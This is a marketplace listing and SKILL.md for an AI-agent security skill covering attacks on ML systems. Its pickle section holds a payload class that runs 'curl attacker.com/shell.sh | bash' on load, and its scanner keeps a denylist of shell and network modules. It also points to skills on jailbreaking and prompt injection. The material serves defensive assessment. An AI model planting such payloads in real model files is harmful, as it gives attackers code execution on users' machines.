Ai Ml Security

Name: Ai Ml Security
Author: yaklang

yaklang/hack-skills

Assess AI and ML systems for pickle RCE, model poisoning, adversarial examples, extraction, privacy attacks, and agent-specific risks before or after ship.

Overview

AI/ML Security is an agent skill used most often in Ship (and also in Operate/Iterate and Build/Integrations). It provides an expert playbook for model supply-chain, adversarial, poisoning, extraction, and privacy attacks on AI/ML systems.

Install

npx skills add https://github.com/yaklang/hack-skills --skill ai-ml-security

What is this skill?

Model supply chain coverage including pickle-based PyTorch deserialization RCE
Adversarial attack families: FGSM, PGD, C&W, and physical-world variants
Training data poisoning, model stealing, and black-box extraction practicality
Privacy attacks: membership inference, model inversion, and gradient leakage
Routes to companion skills for prompt injection, deserialization, and dependency confusion

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

What problem does it solve?

You are shipping ML weights, APIs, or agents but lack a structured view of pickle RCE, poisoning, adversarial inputs, and data-leakage attacks against your stack.

Who is it for?

Solo builders and small teams launching agents, fine-tuned models, or ML-backed APIs who need red-team framing without hiring a full ML security practice.

Skip if: you are building pure non-ML CRUD apps with no models, or you need formal compliance attestations only, without technical threat modeling.

When should I use this skill?

Assessing model supply chain attacks, adversarial examples, model poisoning, model stealing, data privacy attacks, or autonomous agent security risks.

What do I get? / Deliverables

You get a prioritized attack-oriented review map and routing to related skills so hardening and testing focus on realistic AI/ML failure modes before users or attackers find them.

Threat-oriented review checklist aligned to AI/ML attack classes
Pointers to related skills for prompt injection, deserialization, and dependency confusion

Recommended Skills

Azure Compliance (microsoft/azure-skills)

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc… (373k installs · 1.2k stars)

Openclaw Secure Linux Cloud (xixu-me/skills)

OpenClaw Secure Linux Cloud guides a hardened VPS deployment: rootless Podman, loopback-only gateway, SSH-tunneled Contro… (201k installs · 61 stars)

Entra Agent Id (microsoft/azure-skills)

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A… (99.1k installs · 1.2k stars)

Firebase Security Rules Auditor (firebase/agent-skills)

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b… (40.3k installs · 345 stars)

Firestore Security Rules Auditor (firebase/agent-skills)

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who… (20.3k installs · 345 stars)

Skill Vetter (useai-pro/openclaw-skills-security)

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for… (19.2k installs · 62 stars)

Journey fit

Spans multiple journey phases: a primary shelf plus the alternate fits below.

Primary fit

Ship/Security is the primary shelf because the skill is an offensive-security playbook used to harden models, pipelines, and agents before production exposure. The Security subphase fits supply-chain review of weights, deserialization, and LLM/agent abuse patterns, not day-to-day model-training tutorials.

Also useful

Operate: Iteration & experiments

Also useful

Build: Integrations & version control

Where it fits

Example use

Build: Integrations & version control

Review how your agent loads external model files before wiring them into production inference.

Example use

Ship: Security

Run supply-chain and adversarial checks on checkpoints and APIs before go-live.

Example use

Operate: Iteration & experiments

Re-assess poisoning and extraction risks after swapping base models or training on new user data.

How it compares

Complements LLM prompt-injection skills with broader ML supply-chain and adversarial coverage. It is a security methodology, not an MCP monitoring server.

Common Questions / FAQ

Who is ai-ml-security for?

Developers and indie operators building AI products, loading third-party checkpoints, or exposing model APIs who need structured offensive scenarios for defensive planning.

When should I use ai-ml-security?

During Build, when wiring model loaders and agents; during Ship, for the security review before production; and during Operate/Iterate, when updating weights, datasets, or dependencies.

Is ai-ml-security safe to install?

Review the Security Audits panel on this Prism page. The skill describes attack techniques for authorized assessment; use it only on systems you own or have permission to test.

SKILL.md


# SKILL: AI/ML Security — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert AI/ML security techniques. Covers model supply chain attacks (malicious serialization, Hugging Face model poisoning), adversarial examples (FGSM, PGD, C&W, physical-world), training data poisoning, model extraction, data privacy attacks (membership inference, model inversion, gradient leakage), LLM-specific threats, and autonomous agent security. Base models underestimate the severity of pickle deserialization RCE and the practicality of black-box model extraction.

## 0. RELATED ROUTING

- [llm-prompt-injection](../llm-prompt-injection/SKILL.md) for LLM-specific prompt injection, jailbreaking, and tool abuse techniques
- [deserialization-insecure](../deserialization-insecure/SKILL.md) for deeper coverage of Python pickle and general deserialization attack patterns
- [dependency-confusion](../dependency-confusion/SKILL.md) when the ML pipeline has supply chain risks via pip/npm package confusion

---

## 1. MODEL SUPPLY CHAIN ATTACKS

### 1.1 Malicious Model Files — Pickle RCE

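Python's `pickle` module can execute arbitrary code during deserialization: an object's `__reduce__` method tells the unpickler which callable to invoke, and with which arguments, when the object is rebuilt. PyTorch `.pt`/`.pth` checkpoints are pickle-based by default.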

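```python
import os
import pickle

class MaliciousModel:
    # pickle calls __reduce__ while serializing; the returned (callable, args)
    # pair is stored in the file and invoked by the unpickler on load.
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

# Writing the file is harmless; loading it runs the shell command.
with open('model.pt', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
```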

Calling `torch.load('model.pt')` with `weights_only=False` (the default before PyTorch 2.6) executes the embedded command. The same class of risk applies to these formats:

| Format | Risk | Mitigation |
|---|---|---|
| `.pt` / `.pth` (PyTorch) | **Critical**: pickle-based by default | Use `torch.load(..., weights_only=True)` (available since PyTorch 1.13, the default since 2.6) |
| `.pkl` / `.pickle` | **Critical**: raw pickle | Never load untrusted pickles |
| `.joblib` | **High**: uses pickle internally | Verify provenance |
| `.npy` / `.npz` (NumPy) | **Medium**: `allow_pickle=True` enables RCE | Keep `allow_pickle=False` (the default since NumPy 1.16.3) |
| `.safetensors` | **Safe**: tensor-only format, no code execution | Preferred format |
| `.onnx` | **Safe**: graph definition only, no arbitrary code | Preferred for inference |
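When a plain pickle has to be loaded anyway, the Python documentation's "Restricting Globals" pattern reduces the exposure. You subclass `pickle.Unpickler` and override `find_class`, so that only allowlisted globals are ever resolved. The sketch below is minimal and assumes a hypothetical `SAFE_GLOBALS` allowlist; `AllowlistUnpickler` and `restricted_loads` are illustrative names, not a library API. An allowlist is only as safe as every callable on it, so keep it tiny.

```python
import io
import pickle

# Hypothetical allowlist: the only (module, name) globals this loader resolves.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import any global outside SAFE_GLOBALS."""

    def find_class(self, module, name):
        # Called for GLOBAL/STACK_GLOBAL opcodes, before the REDUCE that would call it.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def restricted_loads(data: bytes):
    """Deserialize pickle bytes while resolving only allowlisted globals."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Fed the `MaliciousModel` payload, this loader raises `UnpicklingError` on `os.system` before anything runs. Plain containers (dicts, lists, floats) need no globals and still load. For PyTorch checkpoints, `weights_only=True` is the conceptually similar, built-in option.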

### 1.2 Hugging Face Model Poisoning

```
Attack vectors:
├── Upload model with pickle-based backdoor to Hub
│   └── Users download via `from_pretrained('attacker/model')`
│       └── pickle deserialization → RCE on load
├── Backdoored weights (no RCE, but biased behavior)
│   ├── Model behaves normally except on trigger inputs
│   └── Example: sentiment model returns positive for competitor's products
├── Malicious tokenizer config
│   └── Custom tokenizer code with embedded payload
└── Poisoned training scripts in model repo
    └── `train.py` with obfuscated backdoor
```

**Detection signals:**
- Weights shipped as `.pt`/`.bin`/`.pkl` files instead of `.safetensors`
- Custom Python code in the repository (`*.py` files outside standard config)
- A `config.json` with an `auto_map` entry, meaning the model only loads with `trust_remote_code=True`
- Model card lacking provenance, training data description, or eval results
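The first three signals can be checked before anything is loaded. The sketch below is minimal and assumes the repo has already been downloaded to a local directory. It walks the files, flags pickle-based weights and custom `.py` files, and checks `config.json` for `auto_map`. It also uses the standard-library `pickletools.genops` to list the globals each pickle would import, without executing it. `DANGEROUS_MODULES`, `triage_repo`, and the other helper names are hypothetical. The opcode walk is a heuristic (a crafted stream can hide its operands), so dedicated scanners such as picklescan or fickling are the better choice in practice. Model-card review stays manual.

```python
import json
import pickletools
import zipfile
from pathlib import Path

# Hypothetical denylist: top-level modules whose callables give code execution.
DANGEROUS_MODULES = {
    "os", "posix", "nt", "subprocess", "builtins", "__builtin__", "sys",
    "socket", "shutil", "runpy", "importlib", "pty", "webbrowser",
}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
MEMO_GET_OPS = {"GET", "BINGET", "LONG_BINGET"}
MEMO_PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
PICKLE_SUFFIXES = {".pt", ".pth", ".bin", ".pkl", ".pickle", ".joblib"}


def pickle_globals(data: bytes) -> list[tuple[str, str]]:
    """List the (module, name) globals a pickle stream imports, without running it.

    Heuristic: STACK_GLOBAL operands are taken to be the last two string pushes
    (memo lookups included); a deliberately crafted stream can evade this.
    """
    found, memo, recent = [], {}, []
    top = None  # value of the most recent push if it was a string, else None
    for opcode, arg, _pos in pickletools.genops(data):
        op = opcode.name
        if op in STRING_OPS:
            top = arg
            recent.append(arg)
        elif op in MEMO_GET_OPS:
            top = memo.get(arg)
            recent.append(top)
        elif op == "MEMOIZE":
            memo[len(memo)] = top
        elif op in MEMO_PUT_OPS:
            memo[arg] = top
        elif op in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
            top = None
        elif op == "STACK_GLOBAL":
            module, name = recent[-2:] if len(recent) >= 2 else (None, None)
            found.append((module or "?", name or "?"))
            top = None
        elif op not in ("PROTO", "FRAME"):
            top = None  # treat any other opcode as leaving a non-string on top
    return found


def scan_pickle_file(path: Path) -> list[str]:
    """Return 'member: module.name' for denylisted or unresolved imports."""
    if zipfile.is_zipfile(path):  # torch.save() zip layout, e.g. archive/data.pkl
        with zipfile.ZipFile(path) as zf:
            blobs = [(m, zf.read(m)) for m in zf.namelist() if m.endswith(".pkl")]
    else:
        blobs = [(path.name, path.read_bytes())]
    hits = []
    for member, data in blobs:
        try:
            pairs = pickle_globals(data)
        except Exception as exc:  # compressed, truncated, or not a pickle at all
            hits.append(f"{member}: not parseable as pickle ({exc})")
            continue
        hits += [f"{member}: {mod}.{name}" for mod, name in pairs
                 if mod == "?" or mod.split(".")[0] in DANGEROUS_MODULES]
    return hits


def triage_repo(repo_dir: str) -> list[str]:
    """Apply the file-based detection signals to a locally downloaded model repo."""
    root = Path(repo_dir)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.suffix in PICKLE_SUFFIXES:
            findings.append(f"pickle-based weights: {rel}")
            findings += [f"pickle scan: {hit}" for hit in scan_pickle_file(path)]
        elif path.suffix == ".py":
            findings.append(f"custom Python code: {rel}")
    config = root / "config.json"
    if config.is_file() and "auto_map" in json.loads(config.read_text()):
        findings.append("config.json has auto_map (loading needs trust_remote_code=True)")
    return findings
```

On a repo containing the `MaliciousModel` payload as `model.pt`, `triage_repo` reports the pickle-based weights file and an `os.system` import (recorded as `posix.system` on Linux). A legitimate PyTorch checkpoint normally references only `torch.*` and `collections.*` globals.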

### 1.3 Dependency Confusion in ML Pipelines

ML projects often have complex dependency chains:

```
requirements.txt:
  internal-ml-utils==1.2.3    ← private package
  torch==2.0.0
  transformers==4.30.0

Attack: register "internal-ml-utils" on public PyPI with a higher version
→ pip (also consulting PyPI, e.g. via --extra-index-url) installs the attacker's version
→ arbitrary code in setup.py runs at install time
```
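The confusion only bites when pip can see public PyPI for a name that should be private. One example is `--extra-index-url`, where pip considers candidates from every configured index and generally prefers the highest version. The sketch below is a minimal pre-install check and assumes the caller supplies the set of private package names. `find_confusable` and its helpers are hypothetical. The default lookup queries PyPI's JSON endpoint `https://pypi.org/pypi/<name>/json`, which returns 404 for unregistered projects. Names are compared after PEP 503 normalization.

```python
import re
import urllib.error
import urllib.request


def normalize(name: str) -> str:
    """PEP 503 name normalization: runs of -, _, . become one '-', lowercased."""
    return re.sub(r"[-_.]+", "-", name).lower()


def requirement_names(requirements_text: str) -> list[str]:
    """Extract project names from simple requirements.txt lines."""
    names = []
    for line in requirements_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue  # blank line, comment, or pip option such as --extra-index-url
        match = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if match:
            names.append(match.group(0))
    return names


def pypi_has_project(name: str, timeout: float = 5.0) -> bool:
    """True if `name` is registered on public PyPI (the JSON API 404s otherwise)."""
    url = f"https://pypi.org/pypi/{normalize(name)}/json"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise


def find_confusable(requirements_text, private_names, exists_publicly=pypi_has_project):
    """Requirements that should be private but also exist on the public index."""
    private = {normalize(n) for n in private_names}
    return [
        name for name in requirement_names(requirements_text)
        if normalize(name) in private and exists_publicly(name)
    ]
```

An empty result is not proof of safety, because the name could be registered later. Pointing pip at a single private index with `--index-url` and enforcing hashes with `--require-hashes` address the underlying resolution problem.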

---

## 2. ADVERSARIAL EXAMPLES

### 2.1 Attack Taxonomy

| Attack Type | Attacker knowledge | Method |
|---|---|---|
| White-box | Full model access (architecture + weights) | Gradient-based: FGSM, PGD, C&W |
| Black-box (transfer) | Access to a similar model | Craft adversarial examples on a surrogate, then transfer them to the target |
| Black-box (query) | API access only | Esti
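The gradient-based white-box methods share one idea: move the input in the direction that increases the model's loss, within a small perturbation budget. The sketch below is a toy version of FGSM and PGD under the L-infinity norm. It assumes a logistic-regression model, so the input gradient of binary cross-entropy has the closed form `(p - y) * w`; a real attack would compute the gradient with autograd on the target network. PGD is shown without the random start that many implementations add. The weights and input in the usage note are made up for illustration.

```python
import math


def predict_proba(w, b, x):
    """P(y=1 | x) for a logistic-regression model with weights w and bias b."""
    z = sum(wi * xi for wi, xi in zip(w, x)) + b
    return 1.0 / (1.0 + math.exp(-z))


def input_gradient(w, b, x, y):
    """Gradient of binary cross-entropy with respect to the input: (p - y) * w."""
    p = predict_proba(w, b, x)
    return [(p - y) * wi for wi in w]


def sign(v):
    return (v > 0) - (v < 0)


def clip(v, lo, hi):
    return max(lo, min(hi, v))


def fgsm(w, b, x, y, eps, lo=0.0, hi=1.0):
    """Single step of size eps along the gradient sign, clipped to [lo, hi]."""
    g = input_gradient(w, b, x, y)
    return [clip(xi + eps * sign(gi), lo, hi) for xi, gi in zip(x, g)]


def pgd(w, b, x, y, eps, alpha, steps, lo=0.0, hi=1.0):
    """Repeated signed steps of size alpha, projected onto the L-inf eps-ball."""
    x_adv = list(x)
    for _ in range(steps):
        g = input_gradient(w, b, x_adv, y)
        x_adv = [xa + alpha * sign(gi) for xa, gi in zip(x_adv, g)]
        # Projection: stay within eps of the clean input and inside the valid range.
        x_adv = [clip(clip(xa, xi - eps, xi + eps), lo, hi) for xa, xi in zip(x_adv, x)]
    return x_adv
```

Take `w=[2.0, -1.0]`, `b=0.0`, `x=[0.3, 0.2]`, `y=1`. The clean input scores about 0.60. One FGSM step with `eps=0.2` moves it to roughly `[0.1, 0.4]`, which scores about 0.45 and flips the prediction. For a linear model the gradient sign never changes, so PGD lands on the same point; on a nonlinear network the iterations matter.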

